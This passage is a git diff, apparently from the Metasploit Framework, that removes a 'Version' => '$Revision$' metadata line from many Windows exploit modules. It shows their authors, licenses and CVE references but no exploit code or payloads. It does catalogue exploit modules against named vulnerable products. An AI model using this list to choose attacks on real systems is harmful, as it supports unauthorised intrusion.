+26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-3155'], diff --git a/modules/exploits/windows/imap/mdaemon_cram_md5.rb b/modules/exploits/windows/imap/mdaemon_cram_md5.rb index cdd6013719..8b7996b942 100644 --- a/modules/exploits/windows/imap/mdaemon_cram_md5.rb +++ b/modules/exploits/windows/imap/mdaemon_cram_md5.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Unknown' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1520'], diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb index e5f6746990..d556e82327 100644 --- a/modules/exploits/windows/imap/mdaemon_fetch.rb +++ b/modules/exploits/windows/imap/mdaemon_fetch.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Jacopo Cervini', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1358' ], diff --git a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb index 1e70cfa290..be198f3fe8 100644 --- a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb +++ b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Jacopo Cervini ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-1255' ], diff --git a/modules/exploits/windows/imap/mercur_login.rb b/modules/exploits/windows/imap/mercur_login.rb index 67d36aa207..be1cf73956 100644 --- a/modules/exploits/windows/imap/mercur_login.rb +++ b/modules/exploits/windows/imap/mercur_login.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-1255' ], diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb index 163eb31c2e..09818cda0d 100644 --- a/modules/exploits/windows/imap/mercury_login.rb +++ b/modules/exploits/windows/imap/mercury_login.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-1373' ], diff --git a/modules/exploits/windows/imap/mercury_rename.rb b/modules/exploits/windows/imap/mercury_rename.rb index 49fb6adc9f..04a7344f06 100644 --- a/modules/exploits/windows/imap/mercury_rename.rb +++ b/modules/exploits/windows/imap/mercury_rename.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1211'], diff --git a/modules/exploits/windows/imap/novell_netmail_append.rb b/modules/exploits/windows/imap/novell_netmail_append.rb index 31e0eb6dfb..cd27b1dace 100644 --- a/modules/exploits/windows/imap/novell_netmail_append.rb +++ b/modules/exploits/windows/imap/novell_netmail_append.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6425' ], diff --git a/modules/exploits/windows/imap/novell_netmail_auth.rb b/modules/exploits/windows/imap/novell_netmail_auth.rb index 62c81596fc..1fe620698a 100644 --- a/modules/exploits/windows/imap/novell_netmail_auth.rb +++ b/modules/exploits/windows/imap/novell_netmail_auth.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '55175' ], diff --git a/modules/exploits/windows/imap/novell_netmail_status.rb b/modules/exploits/windows/imap/novell_netmail_status.rb index 828cd1dc59..5ce9115ce9 100644 --- a/modules/exploits/windows/imap/novell_netmail_status.rb +++ b/modules/exploits/windows/imap/novell_netmail_status.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-3314' ], diff --git a/modules/exploits/windows/imap/novell_netmail_subscribe.rb b/modules/exploits/windows/imap/novell_netmail_subscribe.rb index 39a85da1e4..47ad522926 100644 --- a/modules/exploits/windows/imap/novell_netmail_subscribe.rb +++ b/modules/exploits/windows/imap/novell_netmail_subscribe.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6761' ], diff --git a/modules/exploits/windows/isapi/ms00_094_pbserver.rb b/modules/exploits/windows/isapi/ms00_094_pbserver.rb index 73b514bde3..96ff3ecb81 100644 --- a/modules/exploits/windows/isapi/ms00_094_pbserver.rb +++ b/modules/exploits/windows/isapi/ms00_094_pbserver.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2000-1089' ], diff --git a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb index 618a48919f..5d32493e88 100644 --- a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb +++ b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0349'], diff --git a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb index 1671bbb06e..05c738419f 100644 --- a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb +++ b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0822'], diff --git a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb index 48813d0b73..7dc3d2682a 100644 --- a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb +++ b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-4734'], diff --git a/modules/exploits/windows/isapi/w3who_query.rb b/modules/exploits/windows/isapi/w3who_query.rb index 22208a64f5..03c4a73a8c 100644 --- a/modules/exploits/windows/isapi/w3who_query.rb +++ b/modules/exploits/windows/isapi/w3who_query.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1134' ], diff --git a/modules/exploits/windows/ldap/imail_thc.rb b/modules/exploits/windows/ldap/imail_thc.rb index d965ae8a98..49a3f72e5f 100644 --- a/modules/exploits/windows/ldap/imail_thc.rb +++ b/modules/exploits/windows/ldap/imail_thc.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0297'], diff --git a/modules/exploits/windows/ldap/pgp_keyserver7.rb b/modules/exploits/windows/ldap/pgp_keyserver7.rb index 1b3e2f3afd..c101dd3cd1 100644 --- a/modules/exploits/windows/ldap/pgp_keyserver7.rb +++ b/modules/exploits/windows/ldap/pgp_keyserver7.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-1320' ], diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index 3e1f5ddde8..dd5d1ab49f 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'patrick', # msf v3 port :) ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0581' ], diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index ff66d5bb22..42f5884be2 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb +++ b/modules/exploits/windows/license/calicserv_getconfig.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'patrick', # msf v3 port :) ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0581' ], diff --git a/modules/exploits/windows/license/sentinel_lm7_udp.rb b/modules/exploits/windows/license/sentinel_lm7_udp.rb index a03cc24c8d..71277195b1 100644 --- a/modules/exploits/windows/license/sentinel_lm7_udp.rb +++ b/modules/exploits/windows/license/sentinel_lm7_udp.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0353'], diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 6dfbd3edef..1fcbdd7574 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Local }, 'License' => MSF_LICENSE, 'Author' => [ 'mubix' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index 80d0c57e2d..62717522be 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Local 'mitnick', 'mubix' # Port to local exploit ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb index 5a782a2382..8ebed8a823 100644 --- a/modules/exploits/windows/local/current_user_psexec.rb +++ b/modules/exploits/windows/local/current_user_psexec.rb @@ -45,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Local [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ] ], 'DisclosureDate' => 'Jan 01 1999', - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Universal', {} ] ], diff --git a/modules/exploits/windows/local/ms10_092_schelevator.rb b/modules/exploits/windows/local/ms10_092_schelevator.rb index 476a16c804..27ae82b616 100644 --- a/modules/exploits/windows/local/ms10_092_schelevator.rb +++ b/modules/exploits/windows/local/ms10_092_schelevator.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Local }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], diff --git a/modules/exploits/windows/lotus/domino_http_accept_language.rb b/modules/exploits/windows/lotus/domino_http_accept_language.rb index c643d11a54..fb92308fcd 100644 --- a/modules/exploits/windows/lotus/domino_http_accept_language.rb +++ b/modules/exploits/windows/lotus/domino_http_accept_language.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Fairuzan Roslan ', '' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-2240'], diff --git a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb index ebd271ec18..a032716470 100644 --- a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb +++ b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote is needed. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'A. Plaskett', #Initial discovery, poc diff --git a/modules/exploits/windows/lotus/domino_sametime_stmux.rb b/modules/exploits/windows/lotus/domino_sametime_stmux.rb index 99f6fcb10d..d5cc79a740 100644 --- a/modules/exploits/windows/lotus/domino_sametime_stmux.rb +++ b/modules/exploits/windows/lotus/domino_sametime_stmux.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick', 'riaf ' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2499' ], diff --git a/modules/exploits/windows/lotus/lotusnotes_lzh.rb b/modules/exploits/windows/lotus/lotusnotes_lzh.rb index 0a4fc9b663..574f73c334 100644 --- a/modules/exploits/windows/lotus/lotusnotes_lzh.rb +++ b/modules/exploits/windows/lotus/lotusnotes_lzh.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'binaryhouse.net', # original discovery 'alino <26alino[at]gmail.com>', # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-1213'], diff --git a/modules/exploits/windows/lpd/hummingbird_exceed.rb b/modules/exploits/windows/lpd/hummingbird_exceed.rb index 8f74437eb7..4705b6dc19 100644 --- a/modules/exploits/windows/lpd/hummingbird_exceed.rb +++ b/modules/exploits/windows/lpd/hummingbird_exceed.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-1815'], diff --git a/modules/exploits/windows/lpd/niprint.rb b/modules/exploits/windows/lpd/niprint.rb index 56a2e8a358..d23d95f924 100644 --- a/modules/exploits/windows/lpd/niprint.rb +++ b/modules/exploits/windows/lpd/niprint.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2003-1141'], diff --git a/modules/exploits/windows/lpd/saplpd.rb b/modules/exploits/windows/lpd/saplpd.rb index a9d17ed2cc..e4e8f02a47 100644 --- a/modules/exploits/windows/lpd/saplpd.rb +++ b/modules/exploits/windows/lpd/saplpd.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0621' ], diff --git a/modules/exploits/windows/lpd/wincomlpd_admin.rb b/modules/exploits/windows/lpd/wincomlpd_admin.rb index d900821c7f..178f8ec0ad 100644 --- a/modules/exploits/windows/lpd/wincomlpd_admin.rb +++ b/modules/exploits/windows/lpd/wincomlpd_admin.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-5159'], diff --git a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb index fab6efe21c..0471f4f5ab 100644 --- a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb +++ b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1318' ], diff --git a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb index fa53326a64..7f0c4bdd50 100644 --- a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb +++ b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-6166' ], diff --git a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb index af0bddd24d..d4e276684b 100644 --- a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb +++ b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote Credit to Luigi Auriemma }, 'Author' => 'Jacopo Cervini', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1491' ], diff --git a/modules/exploits/windows/misc/bakbone_netvault_heap.rb b/modules/exploits/windows/misc/bakbone_netvault_heap.rb index ae23ec77aa..0ff8baa75e 100644 --- a/modules/exploits/windows/misc/bakbone_netvault_heap.rb +++ b/modules/exploits/windows/misc/bakbone_netvault_heap.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote code written by nolimit and BuzzDee. }, 'Author' => [ 'hdm', '' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-1009'], diff --git a/modules/exploits/windows/misc/bcaaa_bof.rb b/modules/exploits/windows/misc/bcaaa_bof.rb index 763fee541c..f49e07af79 100644 --- a/modules/exploits/windows/misc/bcaaa_bof.rb +++ b/modules/exploits/windows/misc/bcaaa_bof.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote ATTEMPTS option. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Paul Harrington', # Initial discovery and PoC diff --git a/modules/exploits/windows/misc/bigant_server.rb b/modules/exploits/windows/misc/bigant_server.rb index 0daaef40d2..d898dfb8b7 100644 --- a/modules/exploits/windows/misc/bigant_server.rb +++ b/modules/exploits/windows/misc/bigant_server.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1914' ], diff --git a/modules/exploits/windows/misc/bigant_server_250.rb b/modules/exploits/windows/misc/bigant_server_250.rb index 07a2c4faf3..5cbbbf4d35 100644 --- a/modules/exploits/windows/misc/bigant_server_250.rb +++ b/modules/exploits/windows/misc/bigant_server_250.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Dr_IDE ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # It's not clear if these are correct - there was a fix for diff --git a/modules/exploits/windows/misc/bigant_server_usv.rb b/modules/exploits/windows/misc/bigant_server_usv.rb index 92066c6617..e46d44f7b3 100644 --- a/modules/exploits/windows/misc/bigant_server_usv.rb +++ b/modules/exploits/windows/misc/bigant_server_usv.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '61386' ], diff --git a/modules/exploits/windows/misc/bomberclone_overflow.rb b/modules/exploits/windows/misc/bomberclone_overflow.rb index d56ceb8b12..b02341bf7d 100644 --- a/modules/exploits/windows/misc/bomberclone_overflow.rb +++ b/modules/exploits/windows/misc/bomberclone_overflow.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote The shellcode is exec ONLY when someone try to close bomberclone. }, 'Author' => 'Jacopo Cervini ', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-0460'], diff --git a/modules/exploits/windows/misc/bopup_comm.rb b/modules/exploits/windows/misc/bopup_comm.rb index f6702d233c..bd17f8fc02 100644 --- a/modules/exploits/windows/misc/bopup_comm.rb +++ b/modules/exploits/windows/misc/bopup_comm.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2227' ], diff --git a/modules/exploits/windows/misc/borland_interbase.rb b/modules/exploits/windows/misc/borland_interbase.rb index 33b38a51d1..d28f63b713 100644 --- a/modules/exploits/windows/misc/borland_interbase.rb +++ b/modules/exploits/windows/misc/borland_interbase.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote attacker may be able to execute arbitrary code. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3566' ], diff --git a/modules/exploits/windows/misc/borland_starteam.rb b/modules/exploits/windows/misc/borland_starteam.rb index 389f7a4eb0..fb79780c22 100644 --- a/modules/exploits/windows/misc/borland_starteam.rb +++ b/modules/exploits/windows/misc/borland_starteam.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote able to execute arbitrary code. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0311' ], diff --git a/modules/exploits/windows/misc/citrix_streamprocess.rb b/modules/exploits/windows/misc/citrix_streamprocess.rb index 884a89f18c..27022da947 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'mog', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '70597'], diff --git a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb index 9265d98094..e0715c8038 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'AbdulAziz Hariri', # Initial discovery via ZDI 'alino <26alino[at]gmail.com>' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '75780'], diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb index 2dc4ce226a..9301a5ffd4 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'alino <26alino[at]gmail.com>', # citrix_streamprocess_data_msg author 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '75780'], diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb index 33f13c20a2..3505429735 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'alino <26alino[at]gmail.com>', # citrix_streamprocess_data_msg author 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '75780'], diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb index bb92d02b25..e10c61c72c 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'alino <26alino[at]gmail.com>', # citrix_streamprocess_data_msg author 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '75780'], diff --git a/modules/exploits/windows/misc/doubletake.rb b/modules/exploits/windows/misc/doubletake.rb index ef87c7d57a..8c744d6cdf 100644 --- a/modules/exploits/windows/misc/doubletake.rb +++ b/modules/exploits/windows/misc/doubletake.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote was found by Titon of Bastard Labs. }, 'Author' => [ 'ri0t ' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-1661' ], diff --git a/modules/exploits/windows/misc/eiqnetworks_esa.rb b/modules/exploits/windows/misc/eiqnetworks_esa.rb index 559464d1a4..7ab715e92c 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote against ESA v2.1.13. }, 'Author' => [ 'MC', 'ri0t ', 'kf' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-3838'], diff --git a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb index b01c4233cd..896d50b117 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote This module has only been tested against ESA v2.1.13. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-3838'], diff --git a/modules/exploits/windows/misc/eureka_mail_err.rb b/modules/exploits/windows/misc/eureka_mail_err.rb index 8b6f096ae6..1fcedfa586 100644 --- a/modules/exploits/windows/misc/eureka_mail_err.rb +++ b/modules/exploits/windows/misc/eureka_mail_err.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3837' ], diff --git a/modules/exploits/windows/misc/fb_isc_attach_database.rb b/modules/exploits/windows/misc/fb_isc_attach_database.rb index e3a9bd4b27..c11876ac05 100644 --- a/modules/exploits/windows/misc/fb_isc_attach_database.rb +++ b/modules/exploits/windows/misc/fb_isc_attach_database.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/windows/misc/fb_isc_create_database.rb b/modules/exploits/windows/misc/fb_isc_create_database.rb index 3a3586911e..1755ed705f 100644 --- a/modules/exploits/windows/misc/fb_isc_create_database.rb +++ b/modules/exploits/windows/misc/fb_isc_create_database.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/windows/misc/fb_svc_attach.rb b/modules/exploits/windows/misc/fb_svc_attach.rb index 91e9118227..3ed329866b 100644 --- a/modules/exploits/windows/misc/fb_svc_attach.rb +++ b/modules/exploits/windows/misc/fb_svc_attach.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/windows/misc/gimp_script_fu.rb b/modules/exploits/windows/misc/gimp_script_fu.rb index 8e96415b39..0370b1cc10 100644 --- a/modules/exploits/windows/misc/gimp_script_fu.rb +++ b/modules/exploits/windows/misc/gimp_script_fu.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Joseph Sheridan', # Vulnerability Discovery and PoC 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-2763' ], diff --git a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb index 6d97fb05b5..c5072f4d98 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb @@ -37,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote 'juan vazquez', 'sinn3r' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0124' ], diff --git a/modules/exploits/windows/misc/hp_omniinet_1.rb b/modules/exploits/windows/misc/hp_omniinet_1.rb index de20e185de..a2899447d4 100644 --- a/modules/exploits/windows/misc/hp_omniinet_1.rb +++ b/modules/exploits/windows/misc/hp_omniinet_1.rb @@ -39,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Fairuzan Roslan ', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2280' ], diff --git a/modules/exploits/windows/misc/hp_omniinet_2.rb b/modules/exploits/windows/misc/hp_omniinet_2.rb index 5d6417ab9e..42e9a95bc5 100644 --- a/modules/exploits/windows/misc/hp_omniinet_2.rb +++ b/modules/exploits/windows/misc/hp_omniinet_2.rb @@ -39,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote 